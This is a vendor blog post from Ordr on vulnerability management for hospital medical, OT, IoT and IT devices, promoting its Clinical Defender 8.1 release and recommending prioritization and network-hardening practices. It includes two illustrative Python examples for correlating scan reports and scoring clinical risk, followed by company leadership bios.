Why Healthcare Organizations Struggle with Vulnerability Management
By Pandian Gnanaprakasam (13 min read)
Ordr protects three of the top five healthcare organizations in the U.S., and thousands of hospital sites all over the world with our connected device security platform, powered by our device knowledge base of millions of devices. We are a healthcare-first company and continue to innovate to help our customers address their connected medical device security challenges. Today, we're excited to launch Ordr Clinical Defender 8.1, with a Full-Lifecycle Vulnerability Management Platform. This release is based on feedback from our healthcare customers, and is specifically optimized to enable HTM teams to see, prioritize and address all connected medical vulnerabilities and clinical risks.
Why is this a priority?
Quite simply, when you secure your devices, you secure patient care. The more efficient HTM teams are at managing and addressing vulnerabilities for healthcare devices, the better the organization is at delivering safe, connected care. But vulnerability management in healthcare is challenging. The exploding growth of connected devices, coupled with increasing vulnerabilities, a rise in cyberattacks and limited resources introduce various complexities.
In this blog, I discuss why this is a monumental challenge for many organizations, how Ordr is solving it, and the best practices you should consider. Here are the key topics, for those who want to skip to the sections important to them.
1. Vulnerability Management in Healthcare Is Complex
At the healthcare organizations Ordr works with, we see medical devices of a wide variety of makes, models, and modalities from multiple manufacturers. Hospitals have at least about 2000 unique medical device types running some 20 possible operating system variations, and each embedded OS exists in numerous variants at different patch levels. It is not uncommon for the total number of vulnerabilities, the number of device types multiplied by the vulnerabilities associated with each, to reach tens of thousands. This is a huge challenge unless a robust program, combined with technology, tackles it efficiently with the right prioritization methodology.
Moreover, growing ransomware attacks and the recently introduced cybersecurity bill indicate an urgency for quickly and efficiently tackling device vulnerabilities. However, this can be daunting for Healthcare Technology Management (HTM) professionals tasked with managing and maintaining the vast assortment of hospital tools and devices.
2. Medical Device Full-Lifecycle Vulnerability Management
2.1 Device Classification
It is critical that every device connected to a hospital environment is accurately accounted for and monitored 24×7. Ordr's passive technology, using packet captures and deep packet inspection, provides the most comprehensive and granular inventory of devices in a healthcare environment. No other platform can confidently track and monitor 100% of every single connected device in a hospital. Other tools like vulnerability scanners only know about the devices they scan, and endpoint agents only know about the devices they are installed on. Ordr moves this process from a one-time activity that happens periodically to continuous monitoring of devices connecting to the network and continuous tracking of new vulnerabilities published daily.
Ordr has comprehensive and accurate classification methods to deeply understand a medical device's make, model, and modality (how it is configured and deployed in a specific hospital) and then accurately determine the underlying OS down to its patch level. Once a device's OS and patch level are determined, Ordr's vulnerability matching engine compares them against publicly available vulnerability databases, FDA notices, manufacturers' declarations, etc., to get a complete list of all vulnerabilities. This is one of the most challenging aspects of vulnerability management, and Ordr simplifies it for HTM users.
2.2 Vulnerability Identification for the Whole Hospital
Vulnerability management starts with visibility. It is critical to be able to gain granular visibility and complete asset inventory for every device in the hospital.
- Medical devices – The complexity of vulnerability management with most hospital equipment is threefold.
  - Medical equipment very often cannot be scanned like IT endpoints that run standard operating systems. A fully passive mechanism is needed to understand their vulnerabilities based on how they operate. Since these medical devices provide patient care 24×7, any scanning attempt that intensely interrogates them with deep and continuous scans can severely degrade the device's performance and, more often than not, brings the device down in the middle of providing patient care.
  - Patch Tuesday isn't an option. Hospital IT teams cannot simply download a patch from OS providers like Microsoft. Every change in the underlying OS needs some level of retesting of the medical device to recalibrate its performance and could also trigger an FDA validation for critical compliance. Usually, manufacturers provide patches; in practice, that patch is hard to come by quickly when a vulnerability is detected. Patching needs to be done in close cooperation with the manufacturer and is a carefully planned activity so as not to disturb the patient care workflow.
  - Medical manufacturers do not always provide a Software Bill of Materials (SBOM), a Manufacturer Disclosure Statement for Medical Device Security (MDS2), or other field-deployment-related guidance on risk, which makes the vulnerability management life cycle complex in the long run.
- OT devices – While all enterprises depend on operational systems like building management, elevators, HVAC, UPS, etc., to function smoothly, the criticality is exponential in healthcare. Imagine an operating theater without power or access to elevators, or an ER without the ability to admit new patients or access diagnostic systems. A hospital is a single unified, interdependent entity where all systems need to function at the highest level of resiliency. An attack on one is an attack on all. Identifying vulnerabilities on these devices requires passive methods of understanding the OT systems. For instance, OT systems like building management systems need to be accurately inventoried and classified to understand their make/model/OS/patch levels, with the associated vulnerabilities correlated to well-known vulnerability repositories like ICS-CERT.
- IoT devices (including office equipment and security/surveillance devices) – These include everything from office equipment (printers, phones, video conferencing systems) and sound bars to treadmills, vending machines, and gaming devices in rec rooms, and hospital IT teams typically do not isolate these systems very well. Video cameras, badge readers, security alarms, and digital wall clocks are highly critical in hospitals but suffer the same issue as standard office equipment. Most scanning solutions do not offer the make and model details. Again, passive techniques to detect their device type and make/model/OS/patch level are needed to assess their vulnerabilities accurately.
  - Combined and interconnected with other medical equipment, they pose a massive challenge, since it is easy for a hacker to compromise them and move laterally. For instance, accessing one of these insecure devices and then quickly moving laterally to take over a Picture Archiving and Communication System (PACS) server that holds thousands of patient scan images would be mission impacting.
  - Understanding the exact device types of IoT, like make/model/OS/patches and associated vulnerabilities, requires additional techniques such as making direct queries to the device using the protocols these devices speak, interrogating them for their operational characteristics, and executing probes to get an accurate picture of the OS/patch level and the software installed on those devices.
- IT devices – Most scanning tools can periodically scan IT devices, understand their vulnerabilities, and generate a report. Ordr has APIs built for well-known vulnerability scanning platforms to kick-start a scan, pull information from it, correlate it to devices in Ordr's device database, and store it for management. However, IT devices need to be monitored continuously, covering the complete software stack installed on them and accurately tracking users logging on to the devices and local accounts created that are not under the control of the AD/domain controller.
Every device everywhere (including those at remote clinics, and behind VPN/gateways)
More importantly, being unable to manage vulnerabilities for IT devices that go off the grid and dial back in from remote locations leaves enormous blind spots. This also applies to telemedicine and remote clinics. A care provider's laptop accessing sensitive medical records while off the grid is still a high-risk device that needs to be monitored continuously. Vulnerability scanners need the device connected to the corporate network so they can send scanning packets and extract data from the responses. This is done both with full authentication and sometimes without authentication. But if the device is remote, there is no way to run scans continuously.
With the changing remote-hybrid work landscape, laptops connecting to insecure sites, possibly pulling malicious software, making an update or running wrong patches, and an inaccurate or outdated inventory of the software installed on that machine while it is off the grid pose a considerable risk. The nature of hybrid work means they may not come back and connect to the corporate network any time soon, and may only connect through VPN and other means.
Ordr's "whole hospital" approach enables visibility for every device connected to the healthcare network: medical devices, OT devices, IoT devices and traditional IT systems. Clinical Defender 8.1 introduces our Ordr Software Inventory Collector. This feature uses capabilities available in each device's OS to report the software inventory of those systems along with the latest OS patch level for continuous monitoring. This enables visibility for Windows, Mac, and Linux devices connected via VPN even if they are offline.
Utilizing Vulnerability Scanners Effectively in a Clinical Environment
Unleashing any scanner in a hospital environment can be a dangerous move. The chance of knocking down a clinical device is exceptionally high. Unfortunately, vulnerability scanners do not have good visibility into the type of device and tend to scan all the devices broadly in a sweep in a specific subnet.
The Ordr platform provides the orchestration layer that sends scan jobs to the vulnerability scanners with a list of IPs that excludes critical medical devices from scans, and then pulls those reports for storage in the Ordr platform.
2.3 Ownership Assignment Using a Centralized Platform
Consolidating vulnerabilities
The need for a central platform to be a repository of all devices and their associated vulnerabilities is paramount now, given the increase in attacks and the complexity associated with vulnerability management in healthcare settings.
Vulnerability scanning platforms typically produce a report each time they scan a set of IP addresses. When vulnerability scans happen every quarter or six months, and the IP addresses of devices change in between, there is no way to correlate two consecutive scan reports from a vulnerability scanner to understand the progress made in vulnerability management.
Ordr is the only platform that correlates these IP addresses to MAC addresses, and then to the device make/model/type, to help prioritize and understand clinical business risk.
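The correlation problem just described, as an added illustration that is not Ordr's code: two constructed quarterly scan reports are compared first keyed by IP (which misattributes findings once DHCP leases rotate) and then keyed by normalized MAC address. The (ip, mac, cves) record shape and the CVE-EXAMPLE-* identifiers are constructed placeholders, not a real scanner's export format.

```python
"""Compare two vulnerability-scan reports by a stable identifier (MAC) instead of IP.

Added example, not Ordr's code. Both reports and the CVE-EXAMPLE-* identifiers
are constructed; the (ip, mac, cves) record shape is assumed rather than taken
from any real scanner export.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Set


@dataclass(frozen=True)
class ScanRecord:
    ip: str                 # address the scanner used at scan time
    mac: str                # hardware address as the scanner reported it
    cves: FrozenSet[str]    # open findings on that host (empty = clean)


def normalize_mac(mac: str) -> str:
    """Canonical lowercase colon form; scanners differ in case and separators."""
    digits = "".join(ch for ch in mac.lower() if ch in "0123456789abcdef")
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def index_report(report: List[ScanRecord], key: str) -> Dict[str, Set[str]]:
    """Index findings by 'ip' or 'mac'; records sharing a key are merged."""
    if key not in ("ip", "mac"):
        raise ValueError("key must be 'ip' or 'mac'")
    index: Dict[str, Set[str]] = {}
    for rec in report:
        k = rec.ip if key == "ip" else normalize_mac(rec.mac)
        index.setdefault(k, set()).update(rec.cves)
    return index


def compare_reports(prev: List[ScanRecord], curr: List[ScanRecord], key: str) -> Dict[str, Dict[str, object]]:
    """Per host: findings remediated, newly seen, or persisting between two scans."""
    before_idx = index_report(prev, key)
    after_idx = index_report(curr, key)
    result: Dict[str, Dict[str, object]] = {}
    for k in sorted(before_idx.keys() | after_idx.keys()):
        before = before_idx.get(k, set())
        after = after_idx.get(k, set())
        result[k] = {
            "remediated": before - after,
            "new": after - before,
            "persisting": before & after,
            "in_both_scans": k in before_idx and k in after_idx,
        }
    return result


def progress_summary(comparison: Dict[str, Dict[str, object]]) -> Dict[str, int]:
    """Totals a vulnerability-management dashboard would report."""
    totals = {"remediated": 0, "new": 0, "persisting": 0}
    for host in comparison.values():
        for bucket in totals:
            totals[bucket] += len(host[bucket])
    return totals


# Constructed Q1 report: three hosts, findings keyed by their IP at scan time.
Q1_REPORT = [
    ScanRecord("10.20.1.10", "00:11:22:33:44:01",
               frozenset({"CVE-EXAMPLE-0001", "CVE-EXAMPLE-0002"})),
    ScanRecord("10.20.1.11", "00:11:22:33:44:02", frozenset({"CVE-EXAMPLE-0003"})),
    ScanRecord("10.20.1.12", "00:11:22:33:44:03", frozenset({"CVE-EXAMPLE-0004"})),
]

# Constructed Q2 report: DHCP leases rotated, so hosts 01 and 03 swapped IPs.
# Host 01 fixed 0001, host 02 picked up 0005, host 03 is now clean.
Q2_REPORT = [
    ScanRecord("10.20.1.12", "00-11-22-33-44-01", frozenset({"CVE-EXAMPLE-0002"})),
    ScanRecord("10.20.1.11", "00-11-22-33-44-02",
               frozenset({"CVE-EXAMPLE-0003", "CVE-EXAMPLE-0005"})),
    ScanRecord("10.20.1.10", "00-11-22-33-44-03", frozenset()),
]

if __name__ == "__main__":
    for key in ("ip", "mac"):
        summary = progress_summary(compare_reports(Q1_REPORT, Q2_REPORT, key))
        print(f"keyed by {key}: {summary}")
    # keyed by ip:  remediated 3, new 2, persisting 1 (wrongly credits host 01 with fixing 0002)
    # keyed by mac: remediated 2, new 1, persisting 2 (what actually happened)
```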
Assigning ownership
Sometimes ownership crosses device type boundaries and can be complicated. An HTM department may own almost all medical and office-connected devices in a building, including phones, printers, nurse call stations and endpoints in clinical diagnostics. It is not a simple case of assigning ownership based on device group or type. A flexible, scalable, and easy transfer of ownership based on region and location is essential. Also, asset/CMDB data like ownership, cost center, and business criticality need to be considered while assigning ownership. Each department within a hospital that takes ownership of vulnerabilities must further assign them to the individuals responsible for those devices, so the work can be prioritized and focused accordingly.
Enhancements to Ordr Data Shaper allow each HTM user to focus on the devices and insights that align precisely with their specific business function group and role. For instance, vulnerabilities are prioritized and assigned to individual HTM personnel based on device type, hospital ID, department, cost center, etc. Ordr Custom Tags help improve workflows, for instance moving vulnerabilities from one person to another, adjusting severity, adding comments, and tracking state changes. The product customizes itself to show only those vulnerabilities on the front dashboard to track progress, and provides summary management reports at many levels.
2.4 Clinical Prioritization to Improve Patient Care
With hundreds of thousands of devices reporting hundreds of vulnerabilities, organizing and prioritizing becomes daunting. A disciplined approach is needed to prioritize them according to business impact and assign them to the right owners inside the organization.
For risk prioritization, the CVSS is an excellent proxy for understanding the severity of vulnerabilities. Still, it is also essential to look at other frameworks such as ANSI, AAMI, NIST, ISO, FAIR, Risk IT, or JGERR for supplemental guidance and a more comprehensive understanding, recalibrating the scores by going back to the foundational principles of integrity, availability, and confidentiality.
Since healthcare organizations have complex organizational boundaries based on clinical and patient care and not according to the IT needs of a typical enterprise, organizing the data according to ownership is essential.
Ordr's deep and comprehensive visibility into devices, their operating context, and traffic flows provides a number of key indicators that answer the following prioritization questions. Ordr insights can be used to flexibly assess the risk score of a device, and risk score customization helps prioritize and assign resources to work on the most pressing vulnerabilities.
- How widely does this vulnerability affect the device population of the enterprise?
- What is the level of business criticality in terms of cost or other metrics?
- What is the impact to the hospital's brand and service if the device is compromised: sending ambulances to nearby hospitals and postponing elective surgeries?
- How actively is the vulnerability exploited against healthcare? For example, the Maui ransomware from Korea was targeting healthcare very closely.
- How open are these systems to the external world from a firewall policy perspective?
- How open are these devices to other devices in the network from an isolation and segmentation perspective?
- How much PHI/PII do these devices, including medical workstations and servers, hold? The more they serve as a central server, the higher the priority for resolving their vulnerabilities quickly.
- How tightly are these devices configured with respect to open ports?
- How well are they managed by domain controllers? If a device is not under domain controller management, it should be scrutinized more closely.
- How well do they follow data encryption standards, and how well do they use strong ciphers while transferring data?
Clinical risk assessment
In the hospital, risk is derived from various device-related factors and operating conditions. While understanding the cyber threat is foundational, the clinical context in which the device operates in a patient care setting is a critical consideration. Business impact needs to be quantified in terms of how quickly and broadly these risks affect operational resilience and how well one can safeguard the devices carrying PHI/PII data. Without this clinical risk-driven prioritization, patient care availability and safety cannot be guaranteed.
Ordr Clinical Risk Scores deliver the following details about devices and clinical risks, and can be customized by every organization:
- Aggregate Cyber Risk (vulnerabilities, external access to phishing/C&C type sites) and Internal Communications (access from unprotected non-medical devices, the criticality of the device)
- Environmental Risk (polluted medical VLAN, isolated or segmented device, access through wireless, etc.)
- PHI Exposure Risk (sending data without encryption or with weak ciphers, based on manufacturers' disclosure, device portability, etc.)
- Clinical and Operational Risk (physical risk, equipment in ER vs. OR vs. stroke protocol center, the mission criticality of the device, what mitigations are applied, and the location of the device)
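To make the customizable scoring concrete, here is an added example (not Ordr's scoring model) that turns the prioritization questions above into a weighted score grouped into the four risk categories just listed, and shows how re-weighting clinical criticality for a stroke protocol center changes the ranking. The factor normalizations, weights, setting criticalities and the four sample devices are all constructed for illustration.

```python
"""Customizable clinical risk scoring for vulnerability prioritization.

Added example, not Ordr's scoring model. Factor names, default weights,
setting criticalities and the sample inventory are constructed.
"""
from dataclasses import dataclass
from math import log10
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class DeviceContext:
    name: str
    cvss_max: float         # highest CVSS base score among its open vulnerabilities
    internet_exposed: bool  # reachable from outside per perimeter firewall policy
    segmented: bool         # isolated on its own VLAN / segment
    phi_records: int        # approximate PHI/PII records held or relayed
    domain_joined: bool     # under domain-controller management
    weak_ciphers: bool      # sends data unencrypted or with weak ciphers
    setting: str            # clinical setting, see SETTING_CRITICALITY
    population: int         # devices sharing this make/model/OS


# Clinical criticality by setting (assumed values on 0..1).
SETTING_CRITICALITY = {
    "stroke": 1.0, "ER": 0.9, "OR": 0.9, "ICU": 0.8,
    "datacenter": 0.7, "inpatient": 0.5, "office": 0.3, "research": 0.1,
}

# Assumed default weights; each hospital adjusts these to its own priorities.
DEFAULT_WEIGHTS: Dict[str, float] = {
    "cvss": 4.0, "external": 1.5, "unsegmented": 1.5, "phi": 3.0,
    "unmanaged": 1.0, "weak_crypto": 1.0, "clinical": 2.0, "population": 0.5,
}

# Each factor feeds one of the four clinical risk categories.
CATEGORY_OF = {
    "cvss": "cyber", "external": "cyber", "population": "cyber",
    "unsegmented": "environmental", "unmanaged": "environmental",
    "phi": "phi_exposure", "weak_crypto": "phi_exposure",
    "clinical": "clinical_operational",
}


def factors(d: DeviceContext) -> Dict[str, float]:
    """Normalize every prioritization input to the range 0..1."""
    return {
        "cvss": d.cvss_max / 10.0,
        "external": 1.0 if d.internet_exposed else 0.0,
        "unsegmented": 0.0 if d.segmented else 1.0,
        "phi": min(1.0, log10(d.phi_records + 1) / 6.0),        # 1e6 records saturate
        "unmanaged": 0.0 if d.domain_joined else 1.0,
        "weak_crypto": 1.0 if d.weak_ciphers else 0.0,
        "clinical": SETTING_CRITICALITY.get(d.setting, 0.5),
        "population": min(1.0, log10(d.population + 1) / 3.0),  # 1000 devices saturate
    }


def risk_score(d: DeviceContext, weights: Dict[str, float] = DEFAULT_WEIGHTS) -> Tuple[float, Dict[str, float]]:
    """Weighted score on 0..100 plus each risk category's contribution to it."""
    total_weight = sum(weights.values())
    by_category: Dict[str, float] = {}
    for name, value in factors(d).items():
        contribution = weights.get(name, 0.0) * value / total_weight * 100.0
        cat = CATEGORY_OF[name]
        by_category[cat] = by_category.get(cat, 0.0) + contribution
    return round(sum(by_category.values()), 2), {k: round(v, 2) for k, v in by_category.items()}


def prioritize(devices: List[DeviceContext], weights: Dict[str, float] = DEFAULT_WEIGHTS) -> List[Tuple[str, float]]:
    """Rank devices for remediation work, highest score first."""
    ranked = [(d.name, risk_score(d, weights)[0]) for d in devices]
    return sorted(ranked, key=lambda item: item[1], reverse=True)


# Constructed sample inventory: same CVSS does not mean same clinical priority.
SAMPLE_DEVICES = [
    DeviceContext("PACS server", 9.8, False, False, 2_000_000, True, False, "datacenter", 2),
    DeviceContext("CT scanner (stroke center)", 7.5, False, True, 5_000, False, True, "stroke", 4),
    DeviceContext("Research ultrasound", 9.8, False, True, 0, False, False, "research", 1),
    DeviceContext("Lobby IP camera", 8.0, True, False, 0, False, True, "office", 300),
]

# A trauma center that wants stroke-protocol equipment fixed first raises one weight.
STROKE_PROTOCOL_WEIGHTS = {**DEFAULT_WEIGHTS, "clinical": 6.0}

if __name__ == "__main__":
    for label, w in (("default", DEFAULT_WEIGHTS), ("stroke protocol", STROKE_PROTOCOL_WEIGHTS)):
        print(f"{label} weights:")
        for name, score in prioritize(SAMPLE_DEVICES, w):
            print(f"  {score:6.2f}  {name}")
```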
2.5 Compliance and Remediation with Maximum ROI
Once healthcare organizations have a central platform with vulnerability information from different sources independent of how it is collected, workflow organization is critical.
Some of the critical capabilities essential to managing vulnerabilities efficiently can be found in the new "Business Function Grouping" feature in Ordr Clinical Defender 8.1. They include the ability to:
- Assign vulnerable devices based on hospital ID and department (HTM, endpoint, infosec, facility, etc.). Each department needs to focus on the devices it is responsible for and assign the individuals who will work on those vulnerabilities. It is also possible to completely restrict individual users to only the devices they are responsible for. You also need a platform that does this dynamically, filtering by any business function grouping of devices.
- Create a focus group. For example, if this month's goal is to work on all medical servers (like PACS) that house a lot of PHI data, then filter so that only those devices are presented every time one logs into the tool that month.
- Assign custom tags to draw a co-worker's attention, so the device passes from one person to another.
- Temporarily ignore some vulnerabilities. Often manufacturer-provided patches are not available immediately, or the devices are in the research department, not in routine patient care, and isolated from the rest of the hospital operation.
- Modify risk based on the operator's judgment, even when the original risk per the attached CVE is very high, and clear vulnerabilities once patches are applied. Sometimes it is also reasonable to increase the risk and priority of vulnerabilities on specific devices like CTs and ultrasounds in stroke protocol trauma centers.
- Track the status of vulnerabilities as fixed, assigned, or open, with the name of the person working on each.
Reporting and Compliance Enterprise-Wide
While manpower and budgets are a key consideration in determining the return on investment, the time it takes to remediate is also critical, as the longer the exposure window, the greater the chance of a breach. Resources need to be applied intelligently to remediate critical vulnerabilities and get the maximum return on investment.
Ordr offers an ability to keep a close watch on progress using various metrics and reporting as follows:
- Generate reports on-demand. For example, the flexibility to run select region, hospital, department, ownership, OS, and device type allows running reports on the fly.
- Customize reports for senior management visibility.
- Provide APIs that send data to a central corporate-wide tracking database.
Ordr makes reporting and customization easy with a customizable risk score to adjust the weights of vulnerability factors, executive reports that provide summary insights into vulnerable devices, and a dedicated vulnerability report highlighting the impact of newly opened vulnerabilities on the organization.
Ordr also integrates and exchanges information with leading enterprise vulnerability scanners like Tenable and Rapid7 to provide enterprise-wide reporting capability. Ordr also integrates with CMDB solutions like ServiceNow and their vulnerability management systems, allowing healthcare organizations to run corporate-wide reports for governance. Ordr collects medical and other device data and sends all the granular classification details, vulnerabilities, context, security, and operating details to these platforms.
Remediation
Based on these prioritizations, a project plan needs to be maintained and remediation efforts tracked. Ordr provides an easy way to clear a vulnerability, change the state of the device, and a comment field to add notes on the multiple steps towards remediation (called the vendor, the patch is available on this date, etc.).
3. Best Practices for Vulnerability Management in Healthcare
Ordr recommends creating focus groups for each owner, with dedicated efforts on addressing critical vulnerabilities within 30 days, working through a few focus groups at a time. Once critical vulnerabilities are addressed, drill into high-risk vulnerabilities with the same focus group and ownership approach and remediate them within 60 days. It is always good to test patches in a test or lab scenario before applying them to devices in a clinical setting, to reduce the risk of downtime.
Ordr also recommends understanding device types and designing a strategy according to the device groups such as:
- IT systems that are not in clinical function – it is highly recommended that those devices are updated to the latest and most secure OS and associated patch levels.
- Medical devices that run Windows (a large device group in a hospital) – it may be impossible to upgrade the OS version, as that might trigger recalibration and recertification; in this case apply all the patches available within their current OS level.
- Medical devices that run unique versions supplied by the manufacturer – a patch request must be made to the manufacturer; it is important to fix these vulnerabilities as soon as possible.
- IoT and OT – since neither the IT teams nor the supplier may be able to provide patches, the best course is to isolate them in specific network segments or VLANs and closely control their interactions with the rest of the clinical devices.
Whether patches are available or not, it is best practice to follow these proactive prevention measures:
- Restrict external connections at the perimeter firewall and allow only those absolutely critical connections to the manufacturer's sites.
- Understand supervisory protocols like RDP that are sometimes opened for manufacturer diagnostics; watch them closely and close them as soon as the maintenance window is over.
- Watch for all supervisory protocols like SSH, Telnet, RCP, etc., and make sure they are only allowed from admin jump servers operated by authorized admins.
- Apply zero trust policies that allow only the most crucial and relevant communications for every device: at the switch level if they are wired, at the AP/wireless-controller level if they connect through wireless, and at the firewall level both at the perimeter and in the data center.
Ordr Clinical Defender with Vulnerability Management
Ordr is the only comprehensive and integrated platform that simplifies vulnerability lifecycle management for healthcare organizations of all sizes. We introduced Clinical Defender earlier this year, addressing HTM challenges with precision focus, and have now proudly added vulnerability management as we continue to innovate and address our customers' most critical challenges. Clinical Defender now aggregates vulnerabilities for various device groups across all vulnerability management solutions, organizes them by hospital/department/owner, prioritizes by risk, and tracks the complete lifecycle from the initial assessment of a device to final remediation.
We are grateful to the various healthcare users that worked with our engineering and PM teams on this release.
To learn more about Ordr Clinical Defender 8.1 and how it can help your HTM team stay on top of connected device security, visit the Clinical Defender page.
Side Note: In a typical HTM department, inherent operating system (OS) vulnerabilities due to unpatched systems are the highest priority, well before tackling other security issues that may require implementing zero trust segmentation policies. This article discusses only vulnerabilities related to inherent OS/patch levels. Check out our other discussions of behavior- and traffic-flow-related vulnerabilities:
- Detecting Ryuk Ransomware with Ordr – Security Bulletin
- Solving IoT Security Challenges with Behavioral Analytics – Blog Post
- Ordr Security Brief and Response to Maui Ransomware – Blog Post
- Building a Better Second Line of Defense – Blog Post
Pandian Gnanaprakasam
Pandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all of engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 Billion in March 2015. Before Aruba, Pandian served as the head of engineering for Cisco's multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a master's degree in Electrical Engineering from IIT, Chennai, India and holds several patents to his credit in various networking technologies.
About Ordr
We bring "Ordr" to the chaos and complexity of securing connected assets. By filtering out noise and pinpointing critical risks, Ordr empowers you to safeguard every asset, in the cloud, on-premises, or in SaaS environments, and enable cyber resilience.
Our Mission
To make the connected world a safer place.
Our Vision
To protect every connected asset throughout its entire lifecycle.
Meet Our Leadership Team
Jim Hyman, CEO
Jim Hyman joins Ordr bringing more than 20 years of experience building and managing world-class teams in enterprise software and SaaS businesses with a specific expertise in cybersecurity. Prior to taking the helm as Ordr's CEO, Jim was at Synack, the leader in crowdsourced security testing, as their Chief Operating Officer. Jim has successfully driven revenue generation at high growth start-ups and mid-market companies through innovative go-to-market strategies. Previously, Jim was at Trusteer (acquired by IBM in 2013), Z-Scaler (IPO in 2018), and Ironport Systems (acquired by Cisco in 2007). Jim's experience spans sales, alliances, M&A, finance, venture capital and operations working in the US and internationally. Jim received his B.A. from The University of Pennsylvania and his M.B.A. in finance from The University of Southern California.
Gnanaprakasam Pandian, Chief Product Officer & Co-Founder
Pandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all of engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 Billion in March 2015. Before Aruba, Pandian served as the head of engineering for Cisco's multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a master's degree in Electrical Engineering from IIT, Chennai, India and holds several patents to his credit in various networking technologies.
Sheausong Yang, PhD, Chief Scientist & Co-Founder
Before starting Ordr in 2015, Sheausong was the Chief Architect and VP of Technology at Aruba Networks, an HP Company. He has over 28 years of industry experience in wired and wireless networking, cellular communication, system management software, and cloud computing software. Sheausong held both technical and management positions in Cisco Systems, AT&T Bell Labs, and several startup companies. He received his M.S. and Ph.D. in Computer Science from Northwestern University, and B.S. in Electrical Engineering from National Taiwan University.
Raymond Lim, Chief Financial Officer
As CFO, Raymond is a key contributor to the company's business strategy and overseer of all financial operations. He brings more than 20 years of financial management and operational leadership experience guiding several VC-backed SaaS startup companies through rapid growth and transitional stages. He also brings expertise managing high-multiple strategic transactions. Prior to Ordr, he was the CFO of PerimeterX, the leading provider of solutions that secure digital businesses against automated fraud and client-side attacks, which was acquired by HUMAN Security in July 2022. Previous to that, he was the CFO for several VC portfolio companies backed by Norwest Venture Partners, Scale Venture Partners and Goldman Sachs. Earlier in his career, he held various financial, engineering and project management positions at ECbridges and Compuware.
Kevin Arsenault, Chief Revenue Officer
Kevin Arsenault joins Ordr with over 20 years of leadership experience building and scaling high performance sales teams for successful SaaS-based cyber security companies. Prior to Ordr, Kevin held impactful sales leadership roles over 8.5 years at cyber security leader CrowdStrike, most recently as VP of North America. He helped the firm celebrate a successful IPO in June of 2019. Prior to CrowdStrike, Kevin helped build compliance and cyber security firm Proofpoint to its IPO in April of 2012, rising to Worldwide VP of Advanced Security and Information Governance. Kevin also led successful sales teams at Internet Security Systems (ISS) through its acquisition by IBM in August of 2006. Throughout his career, Kevin has maintained a maniacal focus on customer satisfaction with an emphasis on helping customers solve their IT/cybersecurity problems. Kevin received his Bachelor of Science from Boston College Carroll School of Management.
Wes Wright
Chief Healthcare Officer
Wes is responsible for driving Ordr's engagement in healthcare. Previously he was the CTO for Imprivata, and prior to that VP and CTO at Sutter Health, a 26-hospital network in Northern California. Prior to Sutter, Wes was CTO and then CIO at Seattle Children's, which, to this day, he says was his most gratifying work experience. Prior to his tenure at Children's, Wes was Executive Director, IS at Scripps Health in San Diego, and prior to that, he served in various CIO and CTO capacities with the United States Air Force, retiring as a Major. He has several publications and presentations to his credit, and has been a member of CHIME since 1998. Wes has a Master's in Business Administration from The University of New Mexico. Away from work, he enjoys traveling, jogging, napping and playing with his boys; he is a life member of "Marathon Maniacs," but is not active anymore.
Carla Wasko
VP of Human Resources
As Ordr's Vice President of Human Resources, Carla Wasko is a results-driven leader accomplished in building HR strategies, cultures and infrastructures that enable business growth. Prior to Ordr, Carla's breadth of experience includes over 20 years of HR leadership positions with several network and application security companies including WhiteHat Security, Infoblox, Blue Coat Systems and Packeteer.
Senthil Arunachalam
VP Engineering
Senthil has more than 20 years of experience in wired and wireless technologies. Before joining Ordr in 2015, Senthil was the Director of Engineering at Aruba Networks, where he was responsible for the software development of Wireless and SDN products. Prior to Aruba, Senthil held engineering leadership positions at Cisco's Enterprise and Data Center Switching business units. During his tenure, he led the development of Cisco's flagship products, the Catalyst 2K and 3K lines of switches, and was instrumental in building this multi-billion-dollar product line. He holds a B.S. in Electrical Engineering from the National Institute of Technology, Trichy, India, and an M.S. in Electrical Engineering from California State University, Northridge.
Dirk Campbell
VP Customer Success and Services
Dirk Campbell is Vice President of Customer Success and Services at Ordr. He has extensive work experience in customer success and services roles, with special emphasis on customer satisfaction and operating cost-effective global technical support and customer success organizations. Prior to this, he was the Senior Director of Customer Success at ESS, Inc. and the Global Director of Support Services at Aruba, a Hewlett Packard Enterprise company. Dirk has also held positions as Vice President of Global Customer Advocacy at Pluribus Networks, Senior Director of Global Technical Support at Aruba Networks, Director of Worldwide Technical Support at Juniper Networks, Director of Worldwide Customer Advocacy at Neoteris, Inc., and Director of Customer Care at Blue Coat Systems (acquired by Symantec). His work over his career has helped build several of the best-in-class and most respected Services and Support organizations in the industry.
Meet Our Board of Directors
Jim Hyman
CEO
Jim Hyman joins Ordr bringing more than 20 years of experience building and managing world-class teams in enterprise software and SaaS businesses, with specific expertise in cybersecurity. Prior to taking the helm as Ordr's CEO, Jim was Chief Operating Officer at Synack, the leader in crowdsourced security testing. Jim has successfully driven revenue generation at high-growth start-ups and mid-market companies through innovative go-to-market strategies. Previously, Jim was at Trusteer (acquired by IBM in 2013), Z-Scaler (IPO in 2018), and Ironport Systems (acquired by Cisco in 2007). Jim's experience spans sales, alliances, M&A, finance, venture capital and operations, working in the US and internationally. Jim received his B.A. from The University of Pennsylvania and his M.B.A. in finance from The University of Southern California.
René Bonvanie
Executive Chairman, Ordr
